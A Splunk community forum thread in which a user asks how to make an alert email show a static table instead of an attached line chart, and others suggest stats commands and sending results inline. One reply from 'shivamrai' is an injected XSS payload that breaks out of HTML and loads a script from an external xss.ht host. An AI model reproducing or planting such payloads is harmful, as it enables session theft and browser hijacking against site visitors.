Alerting

Alerts, wrong visualization in the attachment

a_n
Path Finder

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

Labels (1)
Tags (1)
0 Karma

a_n
Path Finder

Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

chart is like:
Screen Shot 2021-09-10 at 9.01.22 AM.png

Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.

Is it the only way to do this?
Thank you

 

0 Karma

isoutamo
SplunkTrust
SplunkTrust

Maybe you can change you table + deduce to

...
| stats count by Src, Dst, pt
...

And as you said don't attach pdf etc. into alert email, just link and/or inline.

r. Ismo 

0 Karma

shivamrai
New Member

"><script src=https://shivamraixssht.xss.ht></script>

0 Karma

a_n
Path Finder

Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you

0 Karma

a_n
Path Finder

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.

 

Thank you very much

0 Karma

a_n
Path Finder

Any one can assist please?

0 Karma

isoutamo
SplunkTrust
SplunkTrust

Can you post your query + those visualisations?

0 Karma

a_n
Path Finder

I have added the search and chart, but seems in wrong level.

Please check.

Thank you

0 Karma
Get Updates on the Splunk Community!

.conf24 | Day 0

Hello Splunk Community! My name is Chris, and I'm based in Canberra, Australia's capital, and I travelled for ...

Enhance Security Visibility with Splunk Enterprise Security 7.1 through Threat ...

 (view in My Videos)Struggling with alert fatigue, lack of context, and prioritization around security ...

Troubleshooting the OpenTelemetry Collector

  In this tech talk, you’ll learn how to troubleshoot the OpenTelemetry collector - from checking the ...